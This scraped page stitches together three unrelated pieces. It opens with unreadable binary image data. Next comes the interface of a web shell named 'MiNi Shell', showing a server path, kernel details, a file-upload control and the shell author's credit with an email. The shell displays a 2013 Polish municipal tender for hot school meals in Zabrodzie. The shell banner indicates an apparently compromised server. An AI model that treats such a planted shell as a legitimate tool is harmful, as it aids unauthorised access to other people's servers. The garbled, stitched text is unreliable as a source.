JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131206/264891-N-2013.html

<p class="kh_header"><b>Zabrodzie: Przygotowanie i dostawa oraz wydawanie  gorących posiłków jednodaniowych  dla około 115 dzieci (dziennie) w okresie od  1 stycznia 2014 do 31 grudnia 2014  w przybliżonej ilości 20700 szt. (rocznie) w szkołach  i przedszkolach na terenie gminy Zabrodzie.</b><br>
<b>Numer ogłoszenia: 264891 - 2013; data zamieszczenia: 06.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Zabrodziu , ul. Wł. St. Reymonta 51, 07-230 Zabrodzie, woj. mazowieckie, tel. 029 757 12 28, faks 029 757 12 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zabrodzie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i dostawa oraz wydawanie  gorących posiłków jednodaniowych  dla około 115 dzieci (dziennie) w okresie od  1 stycznia 2014 do 31 grudnia 2014  w przybliżonej ilości 20700 szt. (rocznie) w szkołach  i przedszkolach na terenie gminy Zabrodzie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie z dostawą własnym transportem oraz wydawanie  w siedzibach szkół i przedszkolach na terenie gminy Zabrodzie gorących posiłków jednodaniowych o kaloryczności minimum  900 kcal dla około 115 dzieci (dziennie),  z uwzględnieniem zapewnienia jednorazowych naczyń i sztućców  oraz pieczywa. Przewidywana łączna liczba zamawianych posiłków w całym okresie zamówienia wynosi 20700 szt. (dopuszcza się możliwość; zwiększenia lub zmniejszenia do 30% ilości dostarczanych posiłków).
Zamówienie polega w   szczególności na:
1.	Przygotowywaniu gorących  jednodaniowych posiłków dla szkół podstawowych:  w Adelinie (Zespół Szkolno-Przedszkolny), Dębinkach, Zabrodziu,  szkół gimnazjalnych: w  Zabrodziu   oraz do  Przedszkoli :  w Adelinie, Przedszkola   w Kicinach ( Zespół Szkolno-Przedszkolny w Adelinie), Przedszkola w Zabrodziu.
2.	Dowóz własnym specjalistycznym transportem posiłków w termosach                                oraz wydawanie w przybliżonych ilościach  do następujących szkół:
Zespół Szkolno-Przedszkolny w Adelinie Szkoła Podstawowa    (liczba dzieci -około)  - 30
	Publiczna Szkoła Podstawowa w Dębinkach                                 (liczba dzieci - około) - 13             
Publiczna Szkoła Podstawowa w Zabrodziu                                  (liczba dzieci - około) - 34
Publiczne Gimnazjum w Zabrodziu                                                (liczba dzieci  - około) - 24
Zespół Szkolno-Przedszkolny w Adelinie Przedszkole Adelinie     (liczba dzieci - około)  -  2
Zespół Szkolno-Przedszkolny w Adelinie Przedszkole Kiciny        (liczba dzieci - około)  -  5
Przedszkole w Zabrodziu (przy Szkole Podstawowej w Zabrodziu) (liczba dzieci - około)   - 7  
3.	Posiłki będą dostarczane i wydawane  przez pięć dni w tygodniu od poniedziałku do piątku, wyłącznie w dni w których odbywa się nauka w szkołach czy zajęcia                     w przedszkolu w pomieszczeniach do tego wyznaczonych przez dyrektora placówki. Jeśli dzieci będą uczęszczać do szkoły w inny dzień np. odpracowywać zajęcia szkole, dzieci  objęte są  tą formą pomocy lecz ten fakt szkoły zgłaszają  z 3 dniowym wyprzedzeniem dowożącemu i wydającemu gorące posiłki.  Ponadto posiłki dla Przedszkola w Adelinie i Przedszkola w Kicinach (Zespół Szkolno-Przedszkolny w Adelinie ) oraz Przedszkola w Zabrodziu ( przy Szkole Podstawowej w Zabrodziu)  będą przez wykonawcę  przygotowywane i  dowożone oraz wydawane w okresie  ferii i wakacji szkolnych.
4.	Ilość dzienną tj.  zapotrzebowanie na  dostarczanie  konkretnej  liczby posiłków  przez wykonawcę ustalana będzie codziennie w sposób telefoniczny do godz. 830 przez osoby wyznaczone przez  dyrektorów placówek oświatowych.
5.	Godzina wydawania posiłków w szkołach i przedszkolach jest ustalana przez wykonawcę indywidualnie dla każdej placówki bezpośrednio z dyrekcją szkoły czy przedszkola. 
6.	Wymagania  dla dostarczanych  posiłków:
 Przez  posiłek  należy  rozumieć  gorący jednodaniowy posiłek  (drugie danie lub zupa) powtarzające się okresowo co dwa tygodnie,  w ciągu tygodnia dwa razy zupa oraz trzy razy drugie danie, a przynajmniej 2 razy  w tygodniu   musi być to posiłek mięsny. Gorący posiłek oznacza jego temperaturę nie niższą niż 65 oC.

7.	Gramatura posiłków i zalecany jadłospis
Wartość odżywcza i kaloryczna posiłku  powinna być zgodna z wymogami obowiązującymi   w żywieniu  dzieci w wieku przedszkolnym i szkolnym oraz młodzieży. Posiłek musi zawierać minimum 900 kcal i gramaturę 400g.

Zalecany jadłospis:

Drugie dania:

1.	   Paluszki rybne z ziemniakami i surówką z kiszonej  kapusty, 
2.	   Kotlety z piersi kurczaka z ziemniakami  lub ryżem i surówką z  marchwi lub buraczkami,
3.	   Udko z kurczaka z ziemniakami i surówką z kapusty pekińskiej,
4.	   Bitki wołowe  w keczupie z jabłkiem,
5.	   Zrazy  w sosie własnym,
6.	   Kopytka w sosie ,
7.	   Pyzy z serem,
8.	   Pierogi  nadziewane (mięso, ser),
9.	   Naleśniki  z  konfiturą, sosem owocowym lub śmietaną,
10.	Pulpety z kaszą jęczmienna lub ziemniakami  w sosie własnym z ogórkiem kiszonym,
11.	Potrawka z kurczaka z ziemniakami i surówką z kapusty pekińskiej,
12.	Kotlety mielone lub schabowe  z ziemniakami i surówką z białej lub czerwonej kapusty,
13.	Makaron z sosem warzywnym lub pieczarkowym,
14.	Gulasz wołowy z kasza gryczaną i surówką z kiszonej kapusty,
15.	Kluski śląskie z sosem i surówką z białej kapusty, 
16.	Klopsik wieprzowy w sosie grzybowym lub pomidorowym z ogórkiem kiszonym, 
17.	Krokiety  z mięsem  warzywami i sosem.

Zupy:

1.	Zupa ogórkowa,
2.	Zupa jarzynowa,
3.	Zupa grochowa,
4.	Zupa krupnik,
5.	Zupa pomidorowa,
6.	Zupa zalewajka z kiełbasą,
7.	Zupa z białej kapusty,
8.	Zupa koperkowa,
9.	Zupa szczawiowa z jajkiem
10.	Zupa kalafiorowa,
11.	Barszcz biały,
12.	Barszcz ukraiński,
13.	Rosół z makaronem  z wkładką,
14.	Zupa pieczarkowa,
15.	Zupa borowikowa,
16.	Zupa ogonowa,
17.	Zupa z brokułów.

8.	   Zamawiający  zastrzega, że ilość dostarczanych  gorących posiłków może zmieniać się w trakcie obowiązywania zamówienia ( zwiększenie lub zmniejszenie do 30% wynikających z zamówienia). Każdorazowo na bieżąco dostarczający gorące posiłki  będzie informowany o ilości posiłków które ma dostarczyć. W dniu wydawania posiłku w pomieszczeniu  jego wydawania w miejscu widocznym dostarczający wywiesza menu na każdy dzień dożywiania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.40.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia - zał. nr 2 do SIWZ na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia - zał. nr 2 do SIWZ na zasadzie spełnia/nie spełnia oraz na podstawie Wykazu usług,- zał. nr 4 do SIWZ na zasadzie spełnia/nie spełnia.
Niezbędne jest złożenie wykazu  wykonanych  minimum 2 usług o łącznej  wartości  minimum 80.000zł brutto w tym jedna minimum 50.000zł brutto w zakresie przygotowywania i dostawy posiłków, niezbędnym do wykazania spełnienia warunku wiedzy  i doświadczenia w okresie  trzech lat przed upływem terminu składania ofert, a jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie,  z podaniem  ich wartości, przedmiotu, dat wykonania i odbiorców ( załącznik Nr 4 do SIWZ), oraz załączeniem dokumentów potwierdzających, że dostawy lub usługi  zostały wykonane lub są wykonywane należycie np. referencje</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia - zał. nr 2 do specyfikacji istotnych warunków zamówienia na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia - zał. nr 2 do specyfikacji istotnych warunków zamówienia na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia - zał. nr 2 do specyfikacji istotnych warunków zamówienia na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wpis do rejestru zakładów podlegających kontroli organów Państwowej Inspekcji Sanitarnej  lub decyzja zatwierdzenia wykonawcy w zakresie działalności gastronomicznej, przygotowywania i dostarczania żywności dla odbiorców zewnętrznych typu - catering oraz posiadaniu stanowisk do mycia naczyń transportowych termosów.
2. Zezwolenie lub opinia sanitarna Państwowej Inspekcji Sanitarnej dopuszczająca wyznaczone przez wykonawcę  środki  transportu  w zakresie przewozu posiłków  w termosach lub termopakach.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wystąpienia zmiany przedmiotu lub terminu wykonania zamówienia w następujących przypadkach:
-	z powodu wystąpienia opóźnienia rozstrzygnięcia postępowania przetargowego,
-	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego,
-	z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody,
-	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
-	w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
-	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie z SIWZ - Zamawiający dopuszcza możliwość zmiany umowy,
-	zamawiający dopuszcza zmianę stawki podatku VAT w przypadku zmiany obowiązujących przepisów   w tym zakresie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zabrodzie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Zabrodziu, ul. Wł. St. Reymonta 51, 07-230 Zabrodzie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2013 godzina 09:00, miejsce: Urząd Gminy w Zabrodziu, ul. Władysława Stanisława  Reymonta 51, 07-230 Zabrodzie, Biuro obsługi  klienta - I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com